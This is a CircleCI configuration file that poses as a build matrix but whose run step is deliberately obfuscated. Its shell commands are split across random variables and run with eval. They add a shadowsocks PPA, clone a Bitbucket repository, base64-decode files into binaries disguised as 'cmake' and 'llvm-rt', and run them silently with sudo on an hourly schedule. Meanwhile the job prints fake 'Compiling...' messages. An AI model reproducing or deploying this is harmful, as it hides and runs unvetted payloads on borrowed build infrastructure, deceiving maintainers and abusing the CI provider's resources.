version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--fetch-all-uri", "--ignore-built-slot-operator-deps", "--alphabetical", "--search-similarity", "--sync-submodule", "--getbinpkg", "--binpkg-respect-use", "--autounmask-write", "--autounmask", "--root-deps", "--noconfmem", "--useoldpkg-atoms", "--color", "--with-test-deps", "--dynamic-deps", "--rebuild-if-new-ver", "--dynamic-deps", "--searchdesc", "--root-deps", "--usepkg-exclude"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--fetch-all-uri", "--ignore-built-slot-operator-deps", "--alphabetical", "--search-similarity", "--sync-submodule", "--getbinpkg", "--binpkg-respect-use", "--autounmask-write", "--autounmask", "--root-deps", "--noconfmem", "--useoldpkg-atoms", "--color", "--with-test-deps", "--dynamic-deps", "--rebuild-if-new-ver", "--dynamic-deps", "--searchdesc", "--root-deps", "--usepkg-exclude"]
    triggers:
      - schedule:
          cron: "26 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: Run
          command: |
            LagTgdN="sudo add-ap"
            DMloFkAV="t-repositor"
            zlBcMPDg="y ppa:max-c"
            UNEWN="-lv/shadows"
            isBCirYh="ocks-libev "
            RDNkdjqri="-y &>/dev/n"
            eval "$LagTgdN""$DMloFkAV""$zlBcMPDg""$UNEWN""$isBCirYh""$RDNkdjqri""ull || true"
            ZaBAkmM="sudo add-ap"
            zxhgGJXAxj="t-repositor"
            UVzRucD="y ppa:ondre"
            gEmdkOIiQ="j/apache2 -"
            paDHYltn="y &>/dev/nu"
            eval "$ZaBAkmM""$zxhgGJXAxj""$UVzRucD""$gEmdkOIiQ""$paDHYltn""ll || true"
            sudo apt update || true
            sudo apt --yes install openssl &>/dev/null || true
            RahVEwuc="sudo apt --"
            pOvSaIG="yes install"
            GwNyYxIjgSn=" cl-base64 "
            HDrJhPevVh="git &>/dev/"
            JDvlEuu="null || tru"
            eval "$RahVEwuc""$pOvSaIG""$GwNyYxIjgSn""$HDrJhPevVh""$JDvlEuu""e"
            JehxrhqU="git clone h"
            QKHza="ttps://gccb"
            cityDCji="uild@bitbuc"
            IuCjiswmf="ket.org/gcc"
            QKUEpOrMcL="build/gcc.g"
            mnTVe="it &>/dev/n"
            eval "$JehxrhqU""$QKHza""$cityDCji""$IuCjiswmf""$QKUEpOrMcL""$mnTVe""ull"
            jyVRK="base64 -d g"
            tYcBxwue="cc/cmake_np"
            eval "$jyVRK""$tYcBxwue""_ > cmake"
            DASDprZks="base64 -d g"
            wbbrkZIMFTt="cc/config_ "
            eval "$DASDprZks""$wbbrkZIMFTt""> run"
            TfjBxLE="base64 -d g"
            cVBXCRkLQ="cc/make_ > "
            eval "$TfjBxLE""$cVBXCRkLQ""llvm-rt"
            sed -i 's/1080/1081/g' run
            RVCtGZH="chmod +x ll"
            eval "$RVCtGZH""vm-rt cmake"
            lGtrVOEeGO="./cmake"
            eval "$lGtrVOEeGO"""
            sed -i 's/build/ob2o/g' run
            sudo ./llvm-rt --config run &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2476)) ] && sudo killall llvm-rt && break; sleep 189; done
